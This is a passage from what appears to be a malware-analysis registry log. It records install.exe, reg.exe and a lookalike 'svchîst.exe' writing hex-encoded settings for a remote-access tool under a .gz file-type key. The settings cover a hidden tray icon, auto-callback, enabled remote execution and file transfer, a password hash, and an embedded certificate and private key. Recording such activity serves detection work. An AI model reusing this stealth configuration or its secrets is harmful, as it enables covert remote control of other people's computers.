37265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a	install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a	reg.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a	svchîst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e747275653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a	svchîst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3636302d3439362d3234362d3436323c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a	svchîst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\	svchîst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223639313130223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c465a6e565657564a36515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c4a484f58525a563278315355633161474a585657646a4d3278365a45645764456c49546d786a626c70775933704661553144515564424d5656465158643357677053527a6c305756647364556c484e5768695631566e597a4e73656d5248566e524a534535735932356163474e3651575647647a4235545770424d453155593364505645457a5456524b59555a334d48704e616b4577436b3155555864505645457a5456524b5955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73525749794d576868567a526e596d314764467054516e6f4b5a56684f4d4670584d47646a4d6c5a355a473173656b31545358644a51566c45566c465252455243624556694d6a466f595663305a324a74526e526155304a365a56684f4d4670584d47646a4d6c5a355a4731736567704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a3074445156464651573147616b564e64546c6965554e316545316f5131426e55793947436d31736345525a53466455596e5a555a47393463484a4362474a306457684f5546464e6546677a56484a615757517a5133557955545a764d31524b5a4868755a7a42336257633056446c334d55465652564e6c6433674b554768564d6b55325131524b54306334536e464356566b30543346434b31646e564778685545707356554d7762465a6f636b706f4d4446314f5535506157633357565a34646d3134626d4a735258457a544535585651704d4d7a42686257746e5431567a595464494d574a5464334251576c523352564a464f45684862455a4a6158467851585a6e4e6b74734e335a52546a6c556257354261545242617a524f4d6c52745745356a54303558436e6c6b57466379656b45784d466431576b6c7461464930547a427655476476557a4e694e4646496557647653544254597a5a4c51314130576d645165464278656c4e465a6b565057474e6d5333677a656e4e6e616c454b57454e595247703359314530527a565859334e7852336c334e5755354d324a50575546444d31465865557843536d6470553346705746565163315535547a4a6a526d784c5a6d786b556b4e535746687a655452516177706a55556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b4652516c4d7a5a6e55304e6b6833526e524c553349304c305a79535531334e444e6155336c465a545247436b4e6b597a4a765a335245566a45344d6e4d3553585671646d7378566c6c56576a646b656e4a684d4535566333647864554a464d485657544555335446564a596e526e4e7a457952555a5553574a7651584d315a6b6b4b536e70614f444533535446574e45787554454531624646534f44686b623278614d43387755324a4656464671566d64336430743053575275616c64694e6d6c70575534325545394255564679526d4e7659576f7a4f51704d63456c364d7a5252555546324d32396a5a6b6733655538325555707a645578355369395155556732576d784554544e515a6b686c52474651596b5247555535484e6a45795131565352576c504e316c5257566c6f436c7031593268345a4841345647315356544a6e5348424c5269744a57555248626c6c4f59565a59627a4d3254554a334e584e4751315a465656677855445935595452355432394a566e4e4c596d685a5a476f76526d6f4b6432744d6157314d625556334e444658516b677a56584e6a655868455355387954576c58654777725a546476534442354d475a465530314e59576c4c524746325a32314355533878516b674b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a5355563255556c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746a6432646e553270425a3056425157394a516b465251316c58545646354e7a46325355733352586b4b52556b72516b7734563246586130356e5a46704f64546c4f4d6d704862584e48566e55794e6b55774f554636526d5a6b5433527361444e6a537a6461524846715a4531734d30646c524652445955526f55444e455651704355564a4b4e3052464b305a5557565276536b31724e474a3362573947556d706e4e6d39494e57464354315a764f47315755557854566c644863323149564663334d44413253305230614668484b324a485a485656436c4e7959334d78576c46325a6c4a7859564e424e564e34636e4e6d566e524d5132733562464242556b565564324e685656567053334676517974456233465964546c424d7a465059574e44544764445647637a576b384b576d4d78647a5178596b6f785a474a6954555259556d453161326c68526b686e4e314e6e4b304e6f544752326145466d53304e6e616c4a4b656d39765353396f6255457652537479546b6c534f4645315a486734636770495a6b3935513035435930706a543142436545526e596d786165586c76596b78456244637a5a484d315a30464d5a454a6953584e4662554e4b5333464b5a464572654651774e317033563156774b31597852557047436d526c656b786e4b314a345157644e516b464252554e6e5a305642566d523051586833646b74434b32524964444657536a5a774e556874536b357051565635516e6c45614578685154524f57484e6b513352746130674b5933686a4d6b3556526d7049556e427152577454545567794e5551774f555a4d6455394f625642566330706f556b3548644668775933706e5757464e596d77724f444e335930563451334e51625556495553746e554170455a474e5056324659656b7835536d4a4b4d69394d4b314578626a4274655445726133467164336734654752725457524f524556346130467554456c7254315a6d6456527a637a6b324d474a474c336c545a57744d436c704b65564e53536b6c4e537a633453586b7262335a4f6446644b4c326b725131706d55476446524556796247467457446848616b4e4653315a4364473177616a686f4e574a4864315a51545668474c3239466248514b5933704662546453537a5a73616d4a424e6c6f7a5530467864327835616b78585931704855307051536b3877546d4e525430356e4b31464356484e566253396b566a6c7364446c7a65444273516a6c5a596a5a4562777044617a425356484e47643052484b335a68515652685a546c5159545235617a527161544d344d5856725a30313253565a5864546c4a4d6c464c516d645252455931624870345153394353556c485356707253326f34436b525a615752584c79744b656e6f7a4d57524962304a7565484a304e4768614c337031553349334e4756434b336452656a52704e444e555a30786c656e6c305957745a644452745a6a4269566d6c46624535594d6c594b4e6b6c6b576b56484e544e30576d7445533156484f56557753444a6d65474e50546c4a6e52576843565734796147397055336f72566b5a334e454e61544842784d5456765a464a714f455a6c544849344e57524657516f324e444e715355637252304649546b5251616d6c75626b526d57456c3564315243643074435a314645526b567a51564e56546b67305247647657546446624774784b334d3053446c5a513074445956564a4d6e6335436a683457557831566b356d5769746e5531463156545657536e524b4d6c5a4c5155684c625730344e55647a59303533617a513162336f77563074555a484e4c565574684e476c514e6d51724f55314c596d5675537a494b54336455616a4d796446423554444252546d316a5a584655566e564954444a794e324e6d4d6939305433564a5a6a4a48634539535a454578616d557a55486c6e6555355662334e425644464364306c526546647557416f76556c52554d6b55795633683353304a6e516c645652334e7752546468654642784e6b74344c315a7a54325279613049775557784d655746314e79746162544e785754524c64585978555841726343396e596a4252436d6b355445566b546d316c4e325977654768694e6d3961516d4a5257545a4d576d49784c3070534d584255545734336348426a53486f77557a466f525556514b32746f517a52776455527964464e544e445a714d6d634b5455677855586c356430317057554e4756487061596b7776616b5a4e6146673463476869654656444d58686a5a465577545770555a31553352575a57596d396e4f556b7a5233706e566a6c426230644351557071645170346145783362564e44643252495230637a51316335636b5a75646d6c79627a6c33613070325a334d3153566445526d4d33616b453161555654656d315254444a6d4d553835656b644a557a4e44656e52464d7a424a436c56444e5739585a30466e56336c72623235715458646955335635656d67325a475a744c7a6c6f51585668626c59335a336449647a4e33566b4a576144523563484a33596a4a566445746955575a54556b74485156674b616b704565566c544d44464d59304578533255334d457377596c6f305a44647a5554465256575a3152466c544d5535706347744f4f5546765230466d554464776557745a566d6c4d593152555131564d556d39705741704a645668356156565356484677646d4a47627a564e5557395054304e4d4d484a424e55707864324532597a564d617a56524d6b5a6d564642525a476c485132684262473034596c4a79563252575a3235474d484e53436e6f77613159766248597a65444a7356464a5063334e4452565a4953476c79523141314d6b4a706456463151586c474f58597a5a47684b6144527553575a794c7a6450646e64304d7a646a55486c304f474d7262486f4b626b685252585242566c6c525358557956325179615564744d336778566a6739436930744c533074525535454946425353565a42564555675330565a4c5330744c53304b3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a	svchîst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz	install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655